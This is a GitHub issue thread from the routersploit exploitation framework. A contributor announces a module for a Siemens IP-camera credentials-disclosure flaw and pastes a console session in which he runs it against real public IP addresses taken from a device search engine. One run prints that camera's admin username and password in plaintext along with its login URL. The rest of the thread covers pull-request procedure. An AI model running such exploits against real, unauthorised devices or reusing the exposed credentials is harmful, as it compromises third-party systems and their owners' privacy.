search

threat9 / routersploit

Exploitation Framework for Embedded Devices
Other
12.12k stars 2.31k forks source link

SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure #294

Closed meoww-bot closed 7 years ago

meoww-bot commented 7 years ago

FROM #242

SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure https://www.exploit-db.com/exploits/40254/

I've finished.

I found a vulns ip from zoomeye to verify the module:

[$] <git:(CVMS2025_creds_disclosure)> ./rsf.py 
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___  _   _| |_ ___ _ __\ `--. _ __ | | ___  _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \_\___/ \__,_|\__\___|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
     Router Exploitation Framework   |_|

 Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
 Codename : Bad Blood
 Version  : 2.2.1

 Exploits: 118 Scanners: 29 Creds: 13

rsf > use 
creds     exploits  scanners  
rsf > use exploits/
exploits/cameras/  exploits/misc/     exploits/routers/  
rsf > use exploits/cameras/
exploits/cameras/brickcom/     exploits/cameras/multi/
exploits/cameras/dlink/        exploits/cameras/siemens/
exploits/cameras/grandstream/  exploits/cameras/videoiq/
exploits/cameras/honeywell/    
rsf > use exploits/cameras/siemens/CVMS2025_credentials_disclosure
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > show options
Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                

rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > set target 88.74.119.183
[+] {'target': '88.74.119.183'}
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > run
[*] Running module...
[-] Exploit failed - target seems to be not vulnerable
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > set target 91.114.27.164
[+] {'target': '91.114.27.164'}
rsf (SIEMENS IP-Camera CCMS2025 Password Disclosure) > run
[*] Running module...
[+] Target seems to be vulnerable
var Adm_ID="admin";
var Adm_Pass1="admin";
var Adm_Pass2="admin";
var Language="en";
var Logoff_Time="0";

please login at:
http://91.114.27.164:80/cgi-bin/chklogin.cgi
0BuRner commented 7 years ago

Don't you have to create a new pull request for this instead of a new issue ? =)

When you created a new branch with some changes, simply go to routersploit github project mainpage and a new green button "Create pull request" will appear and will let you create a new pull request based on a specific branch ;)

meoww-bot commented 7 years ago

OK, but he wrote "Create new issue with given exploit and assign yourself to it" , so I tried to create issue but I can't assign myself to it. I've finished several modules, I'll create pull request later. Could u review my codes if u have spare time?

fwkz commented 7 years ago

@VegetableCat Please create new PR regarding this issue. 👍

meoww-bot commented 7 years ago

@fwkz done... #296 BTW, could u please review #287 .Thanks!

busyb0x commented 7 years ago

Please help me with a link of tutorial on how to perform? I am a noob trying to understand please help!

ghost commented 7 years ago

@adydezai Here is the usage wiki: https://github.com/reverse-shell/routersploit/wiki/Usage

lucyoa commented 7 years ago

Good job